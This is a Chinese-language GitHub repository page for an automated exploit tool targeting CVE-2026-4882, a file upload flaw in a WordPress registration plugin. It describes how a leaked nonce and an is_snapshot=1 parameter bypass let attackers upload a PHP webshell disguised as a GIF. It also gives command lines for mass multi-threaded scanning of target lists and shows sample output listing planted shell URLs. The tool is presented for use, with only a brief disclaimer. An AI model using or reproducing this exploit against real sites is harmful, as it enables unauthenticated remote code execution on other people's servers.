xShadow-Here/CVE-2026-4882
GitHub: xShadow-Here/CVE-2026-4882
自动化利用WordPress User Registration Advanced Fields插件未认证任意文件上传漏洞的工具,用于获取远程代码执行。
Stars: 0 | Forks: 0
# CVE-2026-4882 漏洞
User Registration Advanced Fields <= 1.6.20 - 未认证任意文件上传
### 描述:
User Registration Advanced Fields <= 1.6.20 - 未认证任意文件上传
描述
适用于 WordPress 的 User Registration Advanced Fields 插件(版本包括 1.6.20 及更早版本)存在未认证任意文件上传漏洞,攻击可通过 `uraf_profile_picture_upload_method_upload` AJAX 操作实现。该插件会在任何包含注册表单的页面上通过 `wp_localize_script()` 泄漏一个有效的 nonce,并且使用 `is_snapshot=1` 参数可以完全绕过文件扩展名验证。这允许未经身份验证的攻击者上传任意文件(例如伪装成 GIF 图像的 PHP webshell),这些文件被存储在 `wp-content/uploads/user_registration_uploads/temp-uploads/` 中,从而导致远程代码执行 (RCE)。
# 信息: [**CVE-2026-4882**](https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/user-registration-advanced-fields/user-registration-advanced-fields-1620-unauthenticated-arbitrary-file-upload)
~ **CVSS 评分:9.8(严重)**
~ **受影响版本:<= 1.6.20**
- 研究员: [**0xd4rk5id3 - EnvoraSec**](https://www.wordfence.com/threat-intel/vulnerabilities/researchers/0xd4rk5id3)
### 用法:
**单一目标:**
- `python3 shadow.py -u https://target.com -s shadow.php`
**批量目标:**
- `python3 shadow.py -f targets.txt -s shadow.php -t 30`
**交互模式:**
- `python3 shadow.py`
- 输入目标文件名
- 输入线程数(1-50 最大值)
### 功能:
- 多线程
- 错误处理
- 自动获取 Nonce 和表单 ID
- 主页和站点地图抓取(自定义注册路径)
- 表单 ID 暴力破解回退
- 自动解析 HTTP/HTTPS 重定向
- GIF89a 多功能外壳上传
- 验证外壳
- 自动保存结果到 shell.txt
### 输出:
```
╔══════════════════════════════════════════════════╗
║ CVE-2026-4882 — Full Auto Exploit ║
║ User Registration Advanced Fields <= 1.6.20 ║
║ by: Shadow x Friska 😈🔥 ║
╚══════════════════════════════════════════════════╝
═══ Interactive Mode ═══
📄 Target file (e.g. targets.txt): list.txt
⚡ Threads 1-50 (default 30): 30
🎯 Targets : 75
📁 Shell : shadow.php
⚡ Threads : 30
💣 Brute : 1-500
🩷 [3/75] http://target.com
→ http://target.com/wp-content/uploads/user_registration_uploads/temp-uploads/shadow.php
💀 [1/75] http://example.com — no nonce
❌ [4/75] http://example2.com — upload failed
```
## 免责声明:
## 本工具仅用于教育和安全测试目的。
未经授权使用您不拥有或未获许可测试的系统是违法的。
标签:AJAX漏洞, CISA项目, CVE-2026-4882, GIF polyglot, PHP漏洞, Shell上传, Webshell, WordPress安全, 代码执行, 关键漏洞, 安全测试, 插件漏洞, 操作系统监控, 攻击性安全, 文件上传漏洞, 未认证访问, 漏洞分析, 编程工具, 网络安全, 自动发现, 路径探测, 远程代码执行, 逆向工具, 隐私保护